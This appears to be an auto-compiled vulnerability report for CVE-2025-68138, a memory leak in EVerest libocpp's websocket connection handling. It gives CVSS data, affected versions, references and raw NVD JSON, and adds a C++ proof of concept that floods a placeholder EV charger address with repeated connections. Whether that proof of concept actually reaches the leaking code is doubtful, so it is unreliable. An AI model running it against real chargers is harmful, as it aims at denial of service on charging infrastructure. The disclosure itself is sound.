Security Vulnerability Report
CVE-2025-68138 CVSS 4.7 MEDIUM

Published: 2026-01-21 20:16:06
Last Modified: 2026-02-06 21:22:16

Description

EVerest is an EV charging software stack, and EVerest libocpp is a C++ implementation of the Open Charge Point Protocol. In libocpp prior to version 0.30.1, pointers returned by the `strdup` calls are never freed. At each connection attempt, the newly allocated memory area will be leaked, potentially causing memory exhaustion and denial of service. Version 0.30.1 fixes the issue.

CVSS Details

CVSS Score: 4.7
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:linuxfoundation:libocpp:*:*:*:*:*:*:*:* - VULNERABLE
EVerest libocpp < 0.30.1
EVerest everest-core (dependent on vulnerable libocpp version)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```cpp
// CVE-2025-68138 Memory Leak PoC
// This PoC demonstrates the memory leak in EVerest libocpp websocket connections
// Run multiple connection attempts to observe memory growth
#include <chrono>
#include <iostream>
#include <string>
#include <thread>

#include <websocketpp/client.hpp>
#include <websocketpp/config/asio_client.hpp>

typedef websocketpp::client<websocketpp::config::asio_client> client;

int main() {
    try {
        client c;
        c.init_asio();
        c.set_access_channels(websocketpp::log::alevel::all);
        c.clear_access_channels(websocketpp::log::alevel::frame_payload);

        std::string uri = "wss://target-ev-charger/ws";

        // Repeatedly attempt connections to trigger memory leak
        // Each strdup call in websocket_libwebsockets.cpp allocates memory
        // that is never freed
        for (int i = 0; i < 1000; i++) {
            websocketpp::lib::error_code ec;
            client::connection_ptr con = c.get_connection(uri, ec);
            if (ec) {
                std::cout << "Connection error: " << ec.message() << std::endl;
                continue;
            }
            c.connect(con);
            std::this_thread::sleep_for(std::chrono::milliseconds(100));
        }

        // Observe memory usage increasing with each connection attempt
        // Memory will not be released due to missing free() calls
    } catch (websocketpp::exception const & e) {
        std::cout << "WebSocket exception: " << e.what() << std::endl;
    }
    return 0;
}
```

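References

https://github.com/EVerest/everest-core/security/advisories/GHSA-f8c2-44c3-7v55 (Vendor Advisory)
https://github.com/EVerest/libocpp/blob/89c7b62ec899db637f43b54f19af2c4af30cfa66/lib/ocpp/common/websocket/websocket_libwebsockets.cpp (Product)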

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68138", "sourceIdentifier": "[email protected]", "published": "2026-01-21T20:16:06.007", "lastModified": "2026-02-06T21:22:15.583", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "EVerest is an EV charging software stack, and EVerest libocpp is a C++ implementation of the Open Charge Point Protocol. In libocpp prior to version 0.30.1, pointers returned by the `strdup` calls are never freed. At each connection attempt, the newly allocated memory area will be leaked, potentially causing memory exhaustion and denial of service. Version 0.30.1 fixes the issue."}, {"lang": "es", "value": "EVerest es una pila de software de carga de VE, y EVerest libocpp es una implementación en C++ del Protocolo de Punto de Carga Abierto. En libocpp, anterior a la versión 0.30.1, los punteros devueltos por las llamadas a `strdup` nunca se liberan. En cada intento de conexión, el área de memoria recién asignada se filtrará, lo que podría causar agotamiento de la memoria y denegación de servicio. La versión 0.30.1 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:libocpp:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.30.1", "matchCriteriaId": "B5538681-05FD-4070-94F2-BAA9E6CDC81B"}]}]}], "references": [{"url": "https://github.com/EVerest/everest-core/security/advisories/GHSA-f8c2-44c3-7v55", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/EVerest/libocpp/blob/89c7b62ec899db637f43b54f19af2c4af30cfa66/lib/ocpp/common/websocket/websocket_libwebsockets.cpp", "source": "[email protected]", "tags": ["Product"]}]}}